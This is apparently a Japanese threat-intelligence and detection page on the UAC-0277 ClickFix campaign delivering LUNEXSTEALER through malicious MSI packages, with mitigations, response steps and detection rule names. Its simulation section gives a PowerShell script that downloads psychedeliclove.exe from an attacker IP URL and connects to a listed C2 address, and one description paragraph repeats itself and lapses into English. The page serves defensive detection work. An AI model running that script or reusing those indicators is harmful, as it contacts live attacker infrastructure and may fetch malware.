UAC-0277の攻撃が悪性MSIとClickFixを通じてLUNEXSTEALERを配信
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
UAC-0277として追跡されている脅威アクターが、正当なウェブサイトを侵害して悪意のあるJavaScriptを注入し、偽のCloudflare確認ページを通じてユーザーにコマンドを実行させようとしています。このClickFix技術は最終的に、LUNEXSTEALERまたは追加のローダーを含むMSIパッケージを届けるもので、BYOVDを活用してセキュリティコントロールを迂回します。キャンペーンはまた、PolygonやEthereum上でブロックチェーンベースのコマンド&コントロールインフラストラクチャを利用して攻撃者のリソースを動的に管理しています。
調査
CERT-UAは100以上の侵害されたウェブサイトを特定し、キャンペーンに関連する3つのMSIバリアントを分析しました。研究者たちは、FnHotkeyUtility.exeを含むDLLサイドローディングや、Windows Defenderの保護を回避するための脆弱なAMD PDFWKRNL.sysドライバーの悪用を観察しました。また、調査はLUNARAXEブラウザー拡張機能と、データ収集及び流出に使われるNAIVEMESS PowerShellコンポーネントを明らかにしました。
緩和策
管理者はグループポリシーを通じて「ファイル名を指定して実行」(Win+R)へのアクセスを制限し、MSIインストールの権限を認可されたユーザーに限定すべきです。Microsoftの脆弱なドライバーブロックリストを有効化することは、BYOVD攻撃のリスクを低減するために重要です。組織はまた、ブラウザー拡張機能の許可リストを施行し、リモートURLに関与する疑わしいmsiexec.exeコマンドライン活動を監視すべきです。
対応
疑わしいMSI実行や無許可のブラウザー拡張機能が検出された場合、影響を受けたホストを隔離し、LUNEXSTEALERに関連するプロセスを終了してください。psychedelicloveUtilsと名付けられたエントリのスケジュールされたタスクを確認し、Microsoft Office Word Editor拡張機能をブラウザープロファイルで調べてください。キャンペーンに関連する偽のCloudflare確認ページを特定した場合は、CERT-UAに報告してください。
攻撃フロー
検出
LOLBinセマンティクスを持つRunMRUエントリの疑わしい動作(registry_event経由)
リモートMSIファイルのインストール試行の可能性(cmdline経由)
疑わしいスケジュールされたタスク(audit経由)
ダイレクトIPを利用した疑わしいファイルダウンロード(proxy経由)
珍しいトップレベルドメイン(TLD)のDNS要求による疑わしいコマンド&コントロール(dns経由)
検出用IOC(HashSha256): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート2
検出用IOC(HashSha256): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート1
検出用IOC(HashMd5): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート2
検出用IOC(HashMd5): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェアパート1
検出用IOC(SourceIP): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェア
検出用IOC(DestinationIP): UAC-0277キャンペーン: ClickFix技術による悪意のあるMSI配布及びLUNEXSTEALERマルウェア
HTTPおよびWebSocketを使用した悪意のあるC2サーバーとの相互作用の検出 [Windowsネットワーク接続]
FnHotkeyUtilityがDLLサイドローディング経由で悪意のあるspkvol.dllを実行 [Windows Sysmon]
Msiexecを使用した悪意のあるMSIパッケージのダウンロードおよび脆弱性の悪用 [Windowsプロセス作成]
侵害されたウェブサイト上の悪意のあるJavaScriptの検出 [Webサーバー]
シミュレーション実行
-
攻撃の概要とコマンド: 攻撃者はドライブ・バイ感染を成功させました。持続性を確立し、次段階のマルウェアをダウンロードするために、植え付けたエージェントは
psychedeliclove.exeというファイルを特定のURIから取得しようとします。同時に、193.178.159.128にある二次C2ノードへのビーコンを試み、ポートを通じてWebSocketのようなHTTP接続を介して命令を受け取ろうとします。これらの特定の指標は、既存のプロキシ・ベースの検出ルールをトリガーすることを意図しています。を通じてWebSocketのようなHTTP接続を介して命令を受け取ろうとします。これらの特定の指標は、既存のプロキシ・ベースの検出ルールをトリガーすることを意図しています。to receive instructions via a WebSocket-like HTTP connection. These specific indicators are intended to trigger the existing proxy-based detection rules. -
回帰テストスクリプト:
# 検出検証用シミュレーションスクリプト # 目的: 検出ルール中の特定のURLおよびIP/ポート指標をトリガーする。 Write-Host "[*] シミュレーション開始中..." -ForegroundColor Cyan # 1. トリガー選択1: 悪意のあるURLパターン Write-Host "[*] 悪意のあるURLパターンへのアクセスを試みています..." -ForegroundColor Yellow try { # 実際の悪意のあるサイトにアクセスしないよう、非存在のローカルリスナーまたは偽のURLを使用します。 # しかし、プロキシはリクエスト試行をログするべきです。 Invoke-WebRequest -Uri "http://107.175.82.242:9000/wilow/psychedeliclove.exe" -ErrorAction SilentlyContinue } catch { Write-Host "[!] リクエストが失敗しました(期待通り)、しかしテレメトリが生成されるはずです。" -ForegroundColor Gray } # 2. トリガー選択2: 特定のIPとポート Write-Host "[*] ポート8080でC2 IPへの接続を試みています..." -ForegroundColor Yellow try { $client = New-Object System.Net.Sockets.TcpClient $client.Connect("193.178.159.128", 8080) $client.Close() } catch { Write-Host "[!] 接続が失敗しました(期待通り)、しかしプロキシログが試行を捕捉するはずです。" -ForegroundColor Gray } Write-Host "[*] シミュレーション完了。" -ForegroundColor Cyan -
クリーンアップコマンド:
# このシミュレーションによって持続的なファイルは作成されません。 # 一時的なネットワーク接続のみが試みられます。 Write-Host "[*] クリーンアップ完了。システムにアーティファクトは残りませんでした。" -ForegroundColor Green